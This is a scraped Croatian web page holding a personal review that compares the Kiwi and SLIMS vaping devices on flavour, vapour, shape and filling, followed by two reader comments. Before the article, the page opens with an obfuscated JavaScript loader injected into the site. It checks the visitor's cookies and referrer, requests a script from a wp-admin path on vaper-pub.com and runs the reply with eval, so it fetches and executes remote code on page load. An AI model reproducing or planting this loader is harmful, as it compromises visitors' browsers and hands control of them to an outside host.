;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kiwi vs SLIMS – usporedni test

by Zrinka Hakala

Imam oba i ako očekujete da slijedi traktat apsolutno imate pravo, isto tako ako mislite da ću kao zaključiti koji je bolji nemate pravo.

Moja je ideja da probam oba, da pokušam biti objektivna iznijeti činjenice malo opisati jedan i drugi uređaj i na kraju naravno reći kako je sve stvar okusa i ukusa o kojima se ne raspravlja 😉

Ja ću to onako čisto laički, ampere, wate, volte otpore i sve ostale strujne gluposti o kojima pojma nemam imate u opisima samih uređaja na stranicama koji ih prodaju pa čitajte tamo ili ako ste lijeni čitati pitajte stručnjake koji o tome imaju za razliku od mene nekog pojma.

Ajmo sad lagano: Prva je razlika ta što Kiwi ima powerbank al ajde, to svi znaju tako da ću ga zanemarit, kao što dečki već rekoše kupi se ta vanjska baterija za male pare tako da za svaki uređaj možete imati dodatni izvor struje ako vam je to baš bitno da ga možete puniti u pokretu.

Druga je razlika u cijeni, Kiwi je tristotinjak kn skuplji, zbog te dodatne punilice, zbog položaja zvijezda ili zbog nečeg trećeg pojma nemam ali to su činjenice. Nadalje, Kiwi kao što i ptičice na grani znaju ima pamučni filter koji je na neki način sličan filteru na običnoj cigareti i to je često početnicima fora a ponekad čak i odlučujući faktor pri odabiru uređaja.

Oblik: ok svi znaju al ajd, Kiwi je u obliku olovčice, kad nije na bankiću hoće se kotrljat, površina je gumirana tako da ne ispada lako iz ruke dok je s druge strane Slims spljošten od metala je i rebrast je tako da niti on ne klizi iz ruke.

Kiwi sa pamučnim filterom je cca pola cm duži od Slimsa ali je zbog oblika i uži. Al ajd, to su sve tehnikalije koje možete pročitati i vidjeti na sličicama tako da prelazimo na okus i sam rad a to je i najbitnije nekako.

Dakle, Spirit natočen prije nekih dvadesetak minuta, naravno uzela sam za oba uređaja nove podove da ne bude zabune kontaminacije i utjecanja na svjedoke eksperimenta! Izbor je pao na Spirit baš zato što tekućina uopće nije banalna niti jednostavna a pošto sad tu paralelno cuclam oba moralo je biti nešto u čemu guštam. E da, oba uređaja rade na istom principu, samo vučeš, nema gumba i oba se nakon nekog vremena ugase. Period rada je na Kiwiju mrvicu dulji.

Dakle Kiwi: Stavila sam onaj pamučni filter jer kažem, to je nešto zbog čega ga ljudi često i biraju. Količina pare je ok, okus također može proć ali kod ovakve tekućine definitivno uređaj ne izvlači iz tekućine sve što bi trebao, osjeti se kokos i to je uglavnom to, okus iako fin mrvicu je banalan bezličan prazan i plošan, evo, ne znam kako to bolje opisati. Zbog pamučnog filtera para je jednolična, nije vruća, nema pljuckanja a uređaj je pri radu baš tih, ne pucketa, ne grgolji niti išta slično…

Sad idemo na Slims: Aroma je puno jača, iako povlačenje kraće traje tj. uređaj se brže ugasi nego Kiwi imam osjećaj da daje više pare i th je jači a kao što rekoh u oba je uređaja ista tekućina.

Slims je mrvicu ali mrvicu glasniji pri radu, razlika je gotovo neprimjetna ali postoji. Aroma je punija intenzivnija kompleksnija a okus je finiji jer se u tekućini osjeti puno više komponenti npr. čokolada vanilija i sve je ljepše zaokruženo. Kad je u pitanju zagrijavanje uređaja čini mi se da se Kiwi malo više grije. E da, Kiwi također ima i vibraciju kad se umetne pod i nakon cca 15 pufova kao da signalizira kad je okvirno popušena “jedna cigareta”, ta opcija meni osobno ne znači ništa u životu ali eto, tu je.

U Slimsov tankić stane nešto više tekućine što je bar meni bitno da ne moram toliko često nadotakat. Punjenje mi je isto tako draže na Slimsu zbog onog federa ventila jer je teže proliti tekućinu.

Eto, da ne pišem u nedogled možda je najbolje da ako još nekog nešto zanima lijepo pita. Znam da ovo nije napisano niti pregledno niti sistematično ali i htjela sam da bude onako spontano bez puno pripreme, stručnih izraza i pametovanja. Ovo su samo moja iskustva a ne znanstveni članak.

ZAKLJUČAK: rekoh fino da neću sad govorit koji je bolji, mislila sam im davat bodove po kategorijama, na kraju ih zbrajat i tako ali, glupo mi je to. Ako gledamo samo okus Slims je superioran u svakom slučaju. Ako s druge strane trebamo preporučit uređaj nekom početniku možda su Kiwi filteri ono što će tog nekog oduševiti…Ipak uvijek se može sa osobom popričati i vidjeti koji su faktori njoj bitni pri odabiru prvog strojčeka..Osobno koristim oba, volim oba i guštam u njima tako da, samo naprijed, odaberi jedan broj… sigurno nećeš pogriješiti!

Choose your Reaction!
  • @hsavoradmin potkrala ti se pogreška u naslovu. Nije od krucijalne važnosti, al’ nekako bode u oko ;)

    “Kiwi vs SLISM – usporedni test”

  • Lijepi komentar na uređaj Zrinka, može li netko napisati nešto o tom “kontaminiranju” npr? Kod velikih parilica mod+tank sam primjetio kako dosta članova zajednice opere cijeli tank i osuši isti i onda se ide u wickanje i to sve ostalo. Moje pitanje je postoji li osjetno prisustvo prethodno parene tekućine u podu (tanku) i koliko je to?
    Također, osjeti li se okus plastike kod novog nekorištenog tanka u SLIMS-a?
    hvala

Leave a Comment